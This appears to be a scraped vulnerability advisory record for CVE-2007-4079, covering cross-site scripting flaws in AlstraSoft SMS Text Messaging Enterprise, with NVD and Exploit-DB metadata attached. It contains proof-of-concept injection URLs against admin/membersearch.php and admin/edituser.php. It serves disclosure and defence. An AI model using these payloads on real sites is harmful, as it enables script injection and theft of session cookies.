ID OSVDB:37867
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00
Description
Manual Testing Notes
http://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
References:
Related OSVDB ID: 37868
Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html
CVE-2007-4079
Bugtraq ID: 25022
{"href": "https://vulners.com/osvdb/OSVDB:37867", "id": "OSVDB:37867", "reporter": "OSVDB", "published": "2007-07-22T00:00:00", "description": "## Manual Testing Notes\nhttp://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\nhttp://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit\n## References:\n[Related OSVDB ID: 37868](https://vulners.com/osvdb/OSVDB:37868)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "title": "AlstraSoft SMS Text Messaging Enterprise admin/membersearch.php Multiple Variable XSS", "lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "references": [], "edition": 1, "cvelist": ["CVE-2007-4079"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-04-28T13:20:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4079"]}, {"type": "osvdb", "idList": ["OSVDB:37868"]}, {"type": "exploitdb", "idList": ["EDB-ID:30367", "EDB-ID:30368"]}], "modified": "2017-04-28T13:20:33", "rev": 2}, "vulnersScore": 5.7}, "modified": "2007-07-22T00:00:00"}
{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft SMS Text Messaging Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) domain or (2) q parameter to (a) admin/membersearch.php, or (3) the userid parameter to (b) admin/edituser.php.", "edition": 3, "cvss3": {}, "published": "2007-07-30T17:30:00", "title": "CVE-2007-4079", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4079"], "modified": "2008-11-15T06:55:00", "cpe": ["cpe:/a:alstrasoft:sms_text_messaging_enterprise:*"], "id": "CVE-2007-4079", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4079", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:alstrasoft:sms_text_messaging_enterprise:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4079"], "description": "## Manual Testing Notes\nhttp://[Victim]/admin/edituser.php?userid=Walltrapas\"><script>alert()</script>\n## References:\n[Related OSVDB ID: 37867](https://vulners.com/osvdb/OSVDB:37867)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "edition": 1, "modified": "2007-07-22T00:00:00", "published": "2007-07-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37868", "id": "OSVDB:37868", "title": "AlstraSoft SMS Text Messaging Enterprise admin/edituser.php userid Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:14:54", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS. CVE-2007-4079 . Webapps exploit for php platform", "published": "2007-07-23T00:00:00", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4079"], "modified": "2007-07-23T00:00:00", "id": "EDB-ID:30367", "href": "https://www.exploit-db.com/exploits/30367/", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n\r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \r\n\r\nhttp://www.example.com/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\r\nhttp://www.example.com/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30367/"}, {"lastseen": "2016-02-03T12:15:01", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS. CVE-2007-4079 . Webapps exploit for php platform", "published": "2007-07-23T00:00:00", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4079"], "modified": "2007-07-23T00:00:00", "id": "EDB-ID:30368", "href": "https://www.exploit-db.com/exploits/30368/", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n \r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n \r\nhttp://www.example.com/admin/edituser.php?userid=Walltrapas\"><script>alert()</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30368/"}]}